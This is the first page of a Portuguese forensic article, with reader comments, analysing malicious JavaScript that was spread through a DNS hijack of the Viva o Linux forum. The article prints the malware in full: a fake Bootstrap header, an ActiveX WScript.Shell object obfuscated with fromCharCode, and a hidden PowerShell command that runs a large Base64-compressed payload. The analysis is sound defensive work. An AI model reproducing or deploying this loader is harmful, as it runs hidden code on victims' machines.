Desvendando código malicioso no fórum Viva o Linux

Detalhar o procedimento para desvendar o conteúdo do código malicioso no fórum, incluindo passo a passo e parecer das funções do código.

[ Hits: 12.060 ]

Por: ANDRE MILKE DOS SANTOS em 30/11/2016 | Blog: https://br.linkedin.com/in/andremilke


Converter o ASC II da função em caracteres ANSI



Bom dia pessoal,

Na semana passada, (21/11/2016), o fórum Viva o Linux sofreu um sequestro de DNS, o site foi redirecionado para uma página Fake, solicitando aos usuários que efetuassem o download de código JavaScript malicioso sugerindo que o mesmo serviria para troca de senha.

Abaixo alguns trechos do código malicioso:

  /* ========================================================================
 * Bootstrap: affix.js v3.3.7
 * http://getbootstrap.com/javascript/#affix
 * ========================================================================
 * Copyright 2011-2016 Twitter, Inc.
 * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
 * ======================================================================== */
 
(function(){
    var a=(function(){
        var c=navigator.userAgent.toLowerCase();
        if(c.indexOf("safari")!=-1){
            return c.indexOf("chrome")>-1?false:true
            }
            returnfalse
        })(),
        b={
            319:"",
            33496:"",
            155957:"",
            145058:"",
            57248:"",
            83446:"",
            117297:"",
            55601:"",
            115938:"",
            148804:"",
            150561:"",
            79505:"",
            32223:"",
            100253:"",
            132591:"",
            133710:"",
            118184:"",
            110741:"",
            116319:"",
            132110:"",
            150560:"",
            112961:"",
            89413:"",
            155497:"",
            69972:"",
            117497:"",
            96387:"",
            119281:"",
            128495:"",
            107134:"",
            110791:"",
            114634:"",
            45156:"",
            36365:"",
            145160:"",
            120747:"",
            148805:"",
            89376:"",
            113148:"",
            107246:"",
            93639:"",
            120496:"",
            47683:"",
            73102:""
        };});

var DEGRADE = new ActiveXObject(String.fromCharCode(87)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(46)+String.fromCharCode(83)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(108)+String.fromCharCode(108));

DEGRADE.run(String.fromCharCode(112)+String.fromCharCode(111)

Para descobrir o que este código fazia, foi necessário efetuar uma análise, criação de um pequeno aplicativo e algumas horas de empenho que irei demonstrar a seguir.

Ao visualizar o script, percebe-se um objeto DEGRADE, que executa um ActiveX. Os demais métodos parecem apenas uma distração, então o foco foi este objeto.

A primeira atividade para desvendar o conteúdo foi converter o ASC II da função em caracteres ANSI. Para agilizar o processo utilizei o site http://js.do/ e usei a função document.write, para escrever o conteúdo em ANSI.

Após executar para as strings em ASC II, obtive o seguinte resultado:

var DEGRADE = new ActiveXObject(Wscript.Shell );
DEGRADE.run(powershell.exe -NoP -NonI -W Hidden -C sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('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'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd() , 0, false);


    Próxima página

Páginas do artigo
   1. Converter o ASC II da função em caracteres ANSI
   2. Função para decriptar Base64 em string compactada
   3. Parecer final
Outros artigos deste autor

Aquisição Estática de Dados em Computação Forense

Leitura recomendada

Malware, Vírus e Hacking. Estamos seguros usando Linux?

Encapsulando BIND 9 e Apache 2 para obter maior segurança

Nmap do início ao fim (parte 1)

Entenda o que é Hardening

Descobrindo chave WPA2 com Aircrack-ng

  
Comentários
[1] Comentário enviado por kowalskii em 30/11/2016 - 15:04h

Meus parabéns pela análise e pelo ótimo artigo.
Incrível a infinidade de coisas que um simples script em uma página pode fazer.

[2] Comentário enviado por andremilke em 30/11/2016 - 16:32h


[1] Comentário enviado por kowalskii em 30/11/2016 - 15:04h

Meus parabéns pela análise e pelo ótimo artigo.
Incrível a infinidade de coisas que um simples script em uma página pode fazer.


Obrigado kowalskii, fico feliz que tenha gostado.

[3] Comentário enviado por max_lucio em 30/11/2016 - 20:59h

Belo trabalho, parabéns!
Esse script afetaria somente usuário Windows que baixava e executava ?
É usuários no Linux que baixou ?

Obs: Da pra ver que tem mal elemento(cracker) em toda parte, não respeitando o pessoal do software livre que estamos sempre para ajudar a comunidade, e temos que depararmos com essas atitudes querendo manchar o VOL , mais aqui tem pessoas disposta a manter o objetivo de sempre levar informação correta e livre para todos!

[4] Comentário enviado por amarildosertorio em 30/11/2016 - 22:09h

Show de bola!

Muito bacana sua análise.

[5] Comentário enviado por Ghost_Shell em 30/11/2016 - 22:19h


Excelente artigo e dedicação vai para os favoritos.

Keep it simple stupid!

[6] Comentário enviado por andremilke em 30/11/2016 - 22:57h


[3] Comentário enviado por max_sam em 30/11/2016 - 20:59h

Belo trabalho, parabéns!
Esse script afetaria somente usuário Windows que baixava e executava ?
É usuários no Linux que baixou ?

Obs: Da pra ver que tem mal elemento(cracker) em toda parte, não respeitando o pessoal do software livre que estamos sempre para ajudar a comunidade, e temos que depararmos com essas atitudes querendo manchar o VOL , mais aqui tem pessoas disposta a manter o objetivo de sempre levar informação correta e livre para todos!



Olá, o pessoal tava comentando que existe powershell para Linux também, mas acredito que foi direcionado para usuários windows. Devido a iteração nos logs.

[7] Comentário enviado por andremilke em 30/11/2016 - 22:58h


[4] Comentário enviado por amarildosertorio em 30/11/2016 - 22:09h

Show de bola!

Muito bacana sua análise.


Obrigado amigo, foi muito bom escreve-lo e compartilhar.

[8] Comentário enviado por andremilke em 30/11/2016 - 22:59h


[5] Comentário enviado por Ghost_Shell em 30/11/2016 - 22:19h


Excelente artigo e dedicação vai para os favoritos.

Keep it simple stupid!


Valeu Ghost_Shell, deu um trabalho mas que bom que posso compartilhar o resultado e fico grato que gostou.

[9] Comentário enviado por listeiro_037 em 01/12/2016 - 01:19h

Legal o artigo. Estava esperando.
Pode-se considerar esse hacking como um tipo de banker?
T+

----------------------------------------------------------------------------------------------------------------
Nem direita, nem esquerda. Quando se trata de corrupção o Brasil é ambidestro.
(anônimo)

Encryption works. Properly implemented strong crypto systems are one of the few things that you can rely on. Unfortunately, endpoint security is so terrifically weak that NSA can frequently find ways around it. — Edward Snowden

[10] Comentário enviado por Patrick03 em 01/12/2016 - 09:42h

Isso é para mostrar ao raqui que suas ações não ficaram envoltas em mistérios e que terão reações!

---------------------------------------
Corrija-me quando necessário!
https://bartoi.blogspot.com.br/
---------------------------------------

[11] Comentário enviado por ivaniuni em 01/12/2016 - 10:06h

Excelente trabalho amigo! Na sua opnião o que levou esse hacker a atacar o vol? Esse tipo de ataque geralmente é bem planejado com alvo bem definido! Será que a intenção do hacker era se mostrar para o pessoal daqui? Muitas coisas não fazem sentido! Por que o AVG? e os outros anti-vírus como ficam nessa estória? São muitas perguntas difícieis de responder! Deixar o watts-zap também não faz sentido a não ser que fosse um ransomware e o número fosse para pedir resgate! Parabéns pelo trabalho duro! Obrigado!

[12] Comentário enviado por hugutux em 01/12/2016 - 12:57h

Show de bola mano, muito Obrigado pelo seu trabalho!

[13] Comentário enviado por andremilke em 01/12/2016 - 13:39h


[9] Comentário enviado por listeiro_037 em 01/12/2016 - 01:19h

Legal o artigo. Estava esperando.
Pode-se considerar esse hacking como um tipo de banker?
T+

----------------------------------------------------------------------------------------------------------------
Nem direita, nem esquerda. Quando se trata de corrupção o Brasil é ambidestro.
(anônimo)

Encryption works. Properly implemented strong crypto systems are one of the few things that you can rely on. Unfortunately, endpoint security is so terrifically weak that NSA can frequently find ways around it. — Edward Snowden


Acredito que sim, foi essa a intenção

[14] Comentário enviado por andremilke em 01/12/2016 - 13:43h


[11] Comentário enviado por ivaniuni em 01/12/2016 - 10:06h

Excelente trabalho amigo! Na sua opnião o que levou esse hacker a atacar o vol? Esse tipo de ataque geralmente é bem planejado com alvo bem definido! Será que a intenção do hacker era se mostrar para o pessoal daqui? Muitas coisas não fazem sentido! Por que o AVG? e os outros anti-vírus como ficam nessa estória? São muitas perguntas difícieis de responder! Deixar o watts-zap também não faz sentido a não ser que fosse um ransomware e o número fosse para pedir resgate! Parabéns pelo trabalho duro! Obrigado!


Não tenho todas essa repostas, tenho suposições. Houveram outras discussões no forum a respeito, de como ele conseguiu a senha e fez a captura do DNS, talvez ele tenha rodado um script ou feito uma busca em possíveis perfis e encontrou a senha. Talvez tenha sido aleatório.

[15] Comentário enviado por andremilke em 01/12/2016 - 13:45h


[12] Comentário enviado por hugutux em 01/12/2016 - 12:57h

Show de bola mano, muito Obrigado pelo seu trabalho!


Eu que agradeço, que bom que pude colaborar um pouco com o pessoal.

[16] Comentário enviado por andremilke em 01/12/2016 - 13:46h


[10] Comentário enviado por Patrick03 em 01/12/2016 - 09:42h

Isso é para mostrar ao raqui que suas ações não ficaram envoltas em mistérios e que terão reações!

---------------------------------------
Corrija-me quando necessário!
https://bartoi.blogspot.com.br/
---------------------------------------



A ideia era tentar entender o que houve, acho que conseguimos.

[17] Comentário enviado por ctw6av em 01/12/2016 - 21:35h

Belo trabalho, pena que eu não sei nada de java script ou eu ajudaria também.

[18] Comentário enviado por thiago_c em 01/12/2016 - 21:50h

Ótimo artigo, meus parabéns. Desculpe ser indiscreto mas você trabalha com computação forense?

[19] Comentário enviado por andremilke em 02/12/2016 - 09:02h


[17] Comentário enviado por ctw6av em 01/12/2016 - 21:35h

Belo trabalho, pena que eu não sei nada de java script ou eu ajudaria também.


Sempre há tempo para aprender amigo, um abraço.

[20] Comentário enviado por andremilke em 02/12/2016 - 09:04h


[18] Comentário enviado por S4Mu em 01/12/2016 - 21:50h

Ótimo artigo, meus parabéns. Desculpe ser indiscreto mas você trabalha com computação forense?



Olá amigo, não trabalho com computação forense. Só sou um programador interessado na área de segurança da informação, inclusive tô pensando em migrar para essa área, se quiser dar uma olhada no meu linkedin fique a vontade.
https://br.linkedin.com/in/andremilke
Um abraço.

[21] Comentário enviado por tonyfrasouza em 02/12/2016 - 14:59h

Muito ótimo.
Parabéns de coração.
Muito obrigado por dispor de seu tempo que tenho certeza é muito valioso.
Sempre é bom fazer algo que possa ajudar o próximo.
Eu não sou programador. Cuido de um CPD relativamente simples. Servidores Windows 2008 e Servidores Linux.
No entanto amo estudar (fuçar mesmo) códigos em geral, brincar com eles, hardwares de todos os tipos, Assembly, C, C++, essas coisas.
Depois desse acontecimento, por exemplo, me motivou a conhecer mais o que o java script pode fazer e também, de levada, tudo sobre shellcodes.
Vai ser de muita valia para melhorar minha experiência e quem sabe me ajudar a ter mais segurança onde trabalho.
Um abraço e que bons ventos assoprem sempre para o seu lado.

[22] Comentário enviado por tonyfrasouza em 02/12/2016 - 15:09h

Eu de novo...
Eu tenho um código mais ou menos do tipo. Era um que ocultava pastas do pendrive e criava atalhos no lugar, assim, toda vez que o usuário clicava na pasta "atalho" abria a pasta original, mas executava o código.
Eu até "destrinchei" uma parte, mas cai e mais códigos e mostra monte de caminhos. Inclusive do registro do Windows.
Não tenho tanto conhecimento para de fato destrinchar por completo de uma maneira mais prática.
Se não se importar, gostaria que pegasse ele, estudasse e destrinchasse. Se é que já não o fez algum dia.
Já encontrei ele. Tem várias funções e um enorme "String.fromCharCode( )".
Se concordar, vou enviar pelo Linux, pois pelo Windows tem que desativar todo o Antivirus, pois já é um conhecido na praça.

[23] Comentário enviado por andremilke em 04/12/2016 - 14:53h


[21] Comentário enviado por tonyfrasouza em 02/12/2016 - 14:59h

Muito ótimo.
Parabéns de coração.
Muito obrigado por dispor de seu tempo que tenho certeza é muito valioso.
Sempre é bom fazer algo que possa ajudar o próximo.
Eu não sou programador. Cuido de um CPD relativamente simples. Servidores Windows 2008 e Servidores Linux.
No entanto amo estudar (fuçar mesmo) códigos em geral, brincar com eles, hardwares de todos os tipos, Assembly, C, C++, essas coisas.
Depois desse acontecimento, por exemplo, me motivou a conhecer mais o que o java script pode fazer e também, de levada, tudo sobre shellcodes.
Vai ser de muita valia para melhorar minha experiência e quem sabe me ajudar a ter mais segurança onde trabalho.
Um abraço e que bons ventos assoprem sempre para o seu lado.


Que bom, espero que tenha ajudado. Um abraço

[24] Comentário enviado por andremilke em 04/12/2016 - 14:54h


[22] Comentário enviado por tonyfrasouza em 02/12/2016 - 15:09h

Eu de novo...
Eu tenho um código mais ou menos do tipo. Era um que ocultava pastas do pendrive e criava atalhos no lugar, assim, toda vez que o usuário clicava na pasta "atalho" abria a pasta original, mas executava o código.
Eu até "destrinchei" uma parte, mas cai e mais códigos e mostra monte de caminhos. Inclusive do registro do Windows.
